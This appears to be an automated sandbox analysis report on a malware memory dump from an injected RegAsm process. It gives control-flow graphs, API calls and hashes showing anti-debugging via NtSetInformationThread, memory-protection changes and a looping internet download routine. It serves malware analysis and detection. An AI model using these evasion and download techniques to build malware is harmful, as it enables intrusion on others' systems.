          • Part of subcall function 00C02A2C: LoadLibraryA.KERNEL32(?,321C9581,?,00C02F6A,00C01430,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C02A87
        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C002A2
        Strings
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: InformationLibraryLoadThread
        • String ID: 1.!T
        • API String ID: 543350213-3147410236
        • Opcode ID: 2a21159d658b231a9be4fb76f67c7b8cf0f1d300a368ebaff8781a66a60ddcc0
        • Instruction ID: 2e854e65e3bf25d7d768a56209bd3f41f5569d2ac2cd1dd776b56d6c99924e2e
        • Opcode Fuzzy Hash: 2a21159d658b231a9be4fb76f67c7b8cf0f1d300a368ebaff8781a66a60ddcc0
        • Instruction Fuzzy Hash: AB2125B0B40309AFEF20AF648CA6BD937929F86764F954215FD542B2C1CA34CC49D741
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 218 c00ae8-c00be8 call c02a2c call c02996 * 2 225 c00be9-c00c0e call c02996 218->225 228 c00c10-c00c13 225->228 229 c00c15-c00c47 call c035c4 228->229 232 c00c49-c00c57 229->232 233 c00c59-c00c62 232->233 233->233 234 c00c64-c00c70 233->234 235 c00c73-c00c7e 234->235 236 c00c84-c00cb0 call c02996 235->236 237 c02a2c-c02a36 235->237 236->235 245 c00cb2-c00cdc call c02996 236->245 239 c02a87-c02a9a LoadLibraryA call c02a9b 237->239 240 c02a38-c02a49 call c02bee 237->240 247 c036f3-c036f8 call c00fe2 239->247 252 c02a69-c02a84 call c02a9b 240->252 253 c02a4b-c02a5a call c02bee 240->253 245->237 254 c00ce2-c00cf6 245->254 265 c036fd 247->265 252->239 253->252 263 c02a5c-c02a64 call c02bee 253->263 258 c00e2a-c00e34 254->258 259 c00cfc 254->259 258->237 264 c00e3a-c00e83 call c012e1 GetPEB 258->264 262 c00cfe-c00d2a 259->262 262->237 266 c00d30-c00d44 call c02996 262->266 263->252 276 c00f65-c00f69 264->276 277 c00e89-c00e97 264->277 265->265 274 c00e27 266->274 275 c00d4a-c00d5d 266->275 274->258 280 c00d65-c00d6b 275->280 281 c00d5f 275->281 278 c00f7b-c00fdb 276->278 279 c00f6b-c00f76 call c011f8 276->279 282 c00e99-c00f21 call c01351 call c035c4 277->282 278->247 279->278 285 c00d6d-c00d84 280->285 281->280 304 c00f27-c00f63 call c035c4 282->304 288 c00d8a-c00d94 285->288 289 c00e1b-c00e20 285->289 288->237 292 c00d9a-c00da1 288->292 289->262 294 c00da3-c00ded 292->294 295 c00daa-c00dd1 call c02b7b 292->295 294->237 299 c00df3-c00e10 call c02b7b 294->299 302 c00e12-c00e16 295->302 299->302 302->285 304->276
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 3cc4c12eef8dccb4db0d64f7c1835ae39ca29fb27bba43177fa71f976073b7c1
        • Instruction ID: 73ae7fc1750e115282c649cf71753557ec54a48243ac96c65afe6f6bf5f0d9f6
        • Opcode Fuzzy Hash: 3cc4c12eef8dccb4db0d64f7c1835ae39ca29fb27bba43177fa71f976073b7c1
        • Instruction Fuzzy Hash: F1D11771700702AFDB24AF68CD85BE5B3A5FF05360F654229FCA993381DB34A855DB90
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 308 c035c9-c035cd 309 c035ce-c035dd 308->309 309->309 310 c035df-c035ee call c02e9c 309->310 313 c035f1-c035fb 310->313 313->313 314 c035fd-c0361b 313->314 315 c0361c-c03624 314->315 315->315 316 c03626-c0363f 315->316 318 c03645-c0365e 316->318 319 c036db-c036e9 316->319 318->319 320 c03660-c03664 318->320 320->319 321 c03666-c0366c 320->321 322 c03672-c03677 321->322 323 c01416-c0148b call c02f5d call c01818 321->323 322->319 325 c03679-c0367f 322->325 325->319 327 c03681-c03685 325->327 327->319 329 c03687-c0368d 327->329 329->319 330 c0368f-c03697 329->330 330->319 331 c03699-c036a7 330->331 331->319 332 c036a9-c036b6 331->332 332->319 333 c036b8-c036c9 InternetReadFile 332->333 334 c036cc-c036d7 333->334 334->334 335 c036d9 334->335 335->319
        APIs
        • InternetReadFile.WININET(?,?,?,?,?,000000C0,?,?,-00000001,?,00C00127,00000000), ref: 00C036B8
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: FileInternetRead
        • String ID:
        • API String ID: 778332206-0
        • Opcode ID: 9ee27bd1d1670b0679a038fccfdd7fd474a8f3111ce2216514e61a4e32609548
        • Instruction ID: 25e5cb29bc41127ebdb8bffa6b668800f42bca7f24d48a34e6d14c5cc6fabedf
        • Opcode Fuzzy Hash: 9ee27bd1d1670b0679a038fccfdd7fd474a8f3111ce2216514e61a4e32609548
        • Instruction Fuzzy Hash: 12314931B00A469FEF269E24C9597D53396FF51324F9A8269E824C72E4D33ACBC4CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 336 c01d57-c0224b call c01d5c 340 c022b6-c022f7 call c01823 call c01cfe 336->340 341 c0224d-c02268 LdrInitializeThunk 336->341 349 c022f9 340->349 341->340 349->349
        APIs
        • LdrInitializeThunk.NTDLL(00C00A0F,?,00000000,?,00000050,00000369,?,00007EF9,00000079,?,00000000), ref: 00C02266
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: InitializeThunk
        • String ID:
        • API String ID: 2994545307-0
        • Opcode ID: a9f8aef0f28014ce79938ae5fa672dea7dfdb1874de8bf8e286df9429011e6fc
        • Instruction ID: 02f268faf38743dd0f131695002fd4ce74366bf8cb4a5a0a949fd2e90197e8eb
        • Opcode Fuzzy Hash: a9f8aef0f28014ce79938ae5fa672dea7dfdb1874de8bf8e286df9429011e6fc
        • Instruction Fuzzy Hash: 90F0226504D3C52FD31BAB704956A99BF54BB93320B1DC2CED8804E0E3C7589B0AE326
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 350 c02a2c-c02a36 351 c02a87-c02a9a LoadLibraryA call c02a9b 350->351 352 c02a38-c02a49 call c02bee 350->352 357 c036f3-c036f8 call c00fe2 351->357 360 c02a69-c02a84 call c02a9b 352->360 361 c02a4b-c02a5a call c02bee 352->361 368 c036fd 357->368 360->351 361->360 367 c02a5c-c02a64 call c02bee 361->367 367->360 368->368
        APIs
        • LoadLibraryA.KERNEL32(?,321C9581,?,00C02F6A,00C01430,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C02A87
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: cb1c9b970aa955e1ceed1acd26fcead5be75840c0b51afa2a919bf41ebf8f0ee
        • Instruction ID: 41d1c9b5a511fd32fa97abde2535c21eeabe3d87aa40a5e614f5808ce4aafb4a
        • Opcode Fuzzy Hash: cb1c9b970aa955e1ceed1acd26fcead5be75840c0b51afa2a919bf41ebf8f0ee
        • Instruction Fuzzy Hash: E2F0A080B402193AEF307B75AE5DBAE3645CF417B4F248615FCA6A10C6CF38C685F0A1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 371 c031b1-c031cc NtProtectVirtualMemory
        APIs
        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,00C02FC1,00000040,00C01430,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C031CA
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: MemoryProtectVirtual
        • String ID:
        • API String ID: 2706961497-0
        • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
        • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
        • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
        • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 30 c00315-c00351 call c02a2c * 2 35 c00356-c00370 30->35 37 c00410-c00462 call c01f87 call c01996 call c01cdd call c02a2c call c035c4 35->37 38 c00376-c0037e call c00387 35->38 67 c00468-c004cd call c02a2c call c035c4 37->67 68 c0056d-c005e5 call c02a2c * 2 call c035c4 37->68 46 c00380-c003cf call c02b3d 38->46 47 c003e2-c003e7 38->47 48 c02d98-c02db9 call c02bee call c02dbc 46->48 66 c003d5-c003da 46->66 47->48 49 c003ed-c003f2 47->49 49->48 52 c003f8-c00406 49->52 52->35 55 c0040c-c0040e 52->55 55->37 66->48 69 c003e0 66->69 67->68 77 c004d3-c004ea 67->77 68->48 87 c005eb-c005f5 call c0290c 68->87 69->47 79 c004f0-c0050c call c02b3d 77->79 85 c00536-c0053b 79->85 86 c0050e-c00513 79->86 85->48 88 c00541-c00546 85->88 86->48 89 c00519-c00520 86->89 94 c005f7-c00601 87->94 95 c00619-c0061f 87->95 88->48 92 c0054c-c00551 88->92 89->48 93 c00526-c0052b 89->93 92->48 96 c00557-c0055c 92->96 93->48 97 c00531 93->97 100 c00603-c0060d call c01416 94->100 98 c00625-c00655 call c00901 call c02980 call c00861 95->98 99 c006b7-c006bb 95->99 96->48 101 c00562-c00569 96->101 97->85 98->99 135 c00657-c006b4 call c02f5d call c007ca call c00a37 98->135 102 c006d6-c006dd 99->102 103 c006bd-c006c3 99->103 117 c0060f-c00614 100->117 101->79 106 c0056b 101->106 111 c029d0-c029dd call c006e4 102->111 112 c01974-c01991 call c035c4 102->112 107 c006d1 call c009bb 103->107 108 c006c5-c006cf call c00901 103->108 106->68 107->102 108->102 108->107 123 c029e0 111->123 124 c02a49 111->124 112->48 117->112 126 c029e2-c029ee 123->126 127 c02a47-c02a48 123->127 129 c02a69-c02a84 call c02a9b 124->129 130 c02a4b-c02a5a call c02bee 124->130 133 c029f0-c029f1 126->133 134 c02a53-c02a5a 126->134 127->124 143 c02a87-c036f8 LoadLibraryA call c02a9b call c00fe2 129->143 130->129 138 c02a5c-c02a61 130->138 139 c02a64 call c02bee 133->139 140 c029f4-c02a0b 133->140 134->129 134->138 135->99 138->139 139->129 147 c02a7a-c02a84 140->147 148 c02a0d-c02a16 140->148 164 c036fd 143->164 151 c02a85 147->151 148->151 152 c02a18-c02a1c 148->152 154 c02a86 151->154 152->143 156 c02a1e-c02a22 152->156 154->143 156->154 160 c02a24-c02a29 156->160 164->164
        Strings
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: LibraryLoad
        • String ID: down
        • API String ID: 1029625771-486510651
        • Opcode ID: 4e794c59ab959970ffc0bcf9ed64c87f9f18672d482a1ddcb7688cc89a64bfc5
        • Instruction ID: 9d12b2a8b4f6675fb00943e85c0131759931915a30a71fbbd9eafbb64c62854b
        • Opcode Fuzzy Hash: 4e794c59ab959970ffc0bcf9ed64c87f9f18672d482a1ddcb7688cc89a64bfc5
        • Instruction Fuzzy Hash: 94C1C0307403066EDF312A748D9ABED33569F437A0F7A4216FCA59B1D2CB39C986E511
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 191 c01e02-c01e17 InternetOpenA 192 c01f72-c01f82 call c035c4 191->192 193 c01e1d-c01e41 191->193 194 c01e47-c01e64 call c035c4 193->194 195 c001fe-c00216 call c001de 193->195 194->192 202 c01e6a-c01e8d InternetOpenUrlA 194->202 202->192 203 c01e93-c01ebe 202->203 203->195 204 c01ec4 203->204 205 c01ec5-c01ee0 204->205 206 c01ee2-c01ee8 205->206 207 c01eec-c01f08 call c035c4 205->207 206->207 207->192 210 c01f0a-c01f15 207->210 211 c01f17-c01f1d 210->211 212 c01f1f-c01f36 210->212 211->205 212->195 213 c01f3c-c01f6d call c035c4 * 2 212->213
        APIs
        • InternetOpenA.WININET(00C021F4,00000000,00000000,00000000,00000000,00C00A0F,?,00000000,?,00000050,00000369,?,00007EF9,00000079,?,00000000), ref: 00C01E0F
        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00C01E85
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: InternetOpen
        • String ID:
        • API String ID: 2038078732-0
        • Opcode ID: c75a9d65097c32ce9deb08617b5ace6bc1ac87b684fc45183a9ca30a3cb7f84a
        • Instruction ID: a192859ee6556556eed5a662cf2a55a7edde77b8f74470486df6e15bd9535808
        • Opcode Fuzzy Hash: c75a9d65097c32ce9deb08617b5ace6bc1ac87b684fc45183a9ca30a3cb7f84a
        • Instruction Fuzzy Hash: CC418270240386AFEB318E54CD95FED76A9AB50740F548019FE59AE1E0D7729E84EB20
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 372 c01bcd-c01beb CreateFileA
        APIs
        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00C01BA3,00C01C15,00C0027E,00000000,00000000,00000000,00000000,?,00000000), ref: 00C01BE5
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: b470e6cbfe30f7c8a5c45a135d7bb9f58e4fb989e99d2bc6b368ef15af969c69
        • Instruction ID: 3e1c9bfc8a3eb8144f6821e56c8edbbc8a814e8d6c6e06288daf7351dc5fe9ce
        • Opcode Fuzzy Hash: b470e6cbfe30f7c8a5c45a135d7bb9f58e4fb989e99d2bc6b368ef15af969c69
        • Instruction Fuzzy Hash: 94C04C707E0304BEFA3586105D57F8566169B90F00E60440977493D0C546F16951C51D
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 373 c006e4-c00716 call c02f0e 376 c00719-c00738 call c01d57 373->376 379 c00767-c00779 call c00784 Sleep 376->379 380 c0073a-c00762 call c02ec1 call c00ae8 376->380 379->376 380->379
        APIs
          • Part of subcall function 00C01D57: LdrInitializeThunk.NTDLL(00C00A0F,?,00000000,?,00000050,00000369,?,00007EF9,00000079,?,00000000), ref: 00C02266
        • Sleep.KERNEL32(00002710,00000000,00000000,00000000,00000000,00000050,00000369,?,00C029D5,00000000,000000FF,00000007,?,00000004,00000000), ref: 00C00773
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: InitializeSleepThunk
        • String ID:
        • API String ID: 145592009-0
        • Opcode ID: 565e8dbc374c688b8b81abe07e77f0f92a72922e39d7368d97662387314c8e6e
        • Instruction ID: 4865fce9e047dfa55867144419f83d7996cfdba122abe270eed5ddca8a90bdd8
        • Opcode Fuzzy Hash: 565e8dbc374c688b8b81abe07e77f0f92a72922e39d7368d97662387314c8e6e
        • Instruction Fuzzy Hash: 18011430284349EFEF322FA48E46BD83B67AF41784F554104FE48690D2C77A4AA0EF16
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: LibraryLoadMemoryProtectVirtual
        • String ID:
        • API String ID: 3389902171-0
        • Opcode ID: c8e970f62bd2a57e1158c3822921184bcd0f6cbb7114029470c81c6675d23c57
        • Instruction ID: c6fc91732d4adb31bf7da4a1ecedb15e6ea47b329cc31ff2501c5d7bb56ed381
        • Opcode Fuzzy Hash: c8e970f62bd2a57e1158c3822921184bcd0f6cbb7114029470c81c6675d23c57
        • Instruction Fuzzy Hash: 9D719370A543818FDB25CF28C894759BB95AF56324F48C299D5B58F2EAC334CA42C722
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • LoadLibraryA.KERNEL32(?,321C9581,?,00C02F6A,00C01430,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C02A87
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 5d9c1935f0d86af030b9bd62102cc36b891f3770d011a0f8419c7ce8f97a3ed0
        • Instruction ID: 1603b9c1a7f69b798b422c4e09d63f38a4d66b811cf3cbeae577cb16bcf6fc10
        • Opcode Fuzzy Hash: 5d9c1935f0d86af030b9bd62102cc36b891f3770d011a0f8419c7ce8f97a3ed0
        • Instruction Fuzzy Hash: D5314571700612AFD764AA68CC45BE5B3A9FF00360F264229FCA8E33C2CB24DC45DB50
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bb3b66f2a0f3d4d42b6b4c2a7b931b854bcdfcf23061d2ba50fa784772e2ce0b
        • Instruction ID: 2b10994aa2b5053adfe68269d90993d8dfd945c0f4b00ad22a48f8bf621a25f0
        • Opcode Fuzzy Hash: bb3b66f2a0f3d4d42b6b4c2a7b931b854bcdfcf23061d2ba50fa784772e2ce0b
        • Instruction Fuzzy Hash: DD3131B0244340AFEB245F64CC49F99B395BF01324F69806AFD459B2D2C7B4D9C0EB12
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6186af93c4180d974f5bf2389c8e4fd95fedb57eff2d5d76c7055e5283c870a7
        • Instruction ID: 62f56c8f9cc33d9fb7aa5da3d4c5e85a650b4e6b384621609515d1355239021f
        • Opcode Fuzzy Hash: 6186af93c4180d974f5bf2389c8e4fd95fedb57eff2d5d76c7055e5283c870a7
        • Instruction Fuzzy Hash: B6F0A0707011008FF714DF58C2C8F1DB3A2EF99750F6484A5E911CB2A2C234EE80C624
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
        • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
        • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
        • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f4b6863cc23693e0d8a110fb9812b0a854d4ff2cb09985eb4a2135f0fc236b47
        • Instruction ID: 90c93bcf842074def0323cd1db6baba0c1496098558b228b413ee36ce3efb7bf
        • Opcode Fuzzy Hash: f4b6863cc23693e0d8a110fb9812b0a854d4ff2cb09985eb4a2135f0fc236b47
        • Instruction Fuzzy Hash: BAB002757556418FCA55DE19D290F4073B4FB54BA0B455494A455C7A51C264E900C910
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: aeafa03d48bc390408c59c474862eeb80a5e8754063925e1ec4441e030f0515a
        • Instruction ID: 790e0d19b5fa6c94f41eff63ae6443ff61c77d8d2320338748d2a7ad44a99e0b
        • Opcode Fuzzy Hash: aeafa03d48bc390408c59c474862eeb80a5e8754063925e1ec4441e030f0515a
        • Instruction Fuzzy Hash:
        Uniqueness

        Uniqueness Score: -1.00%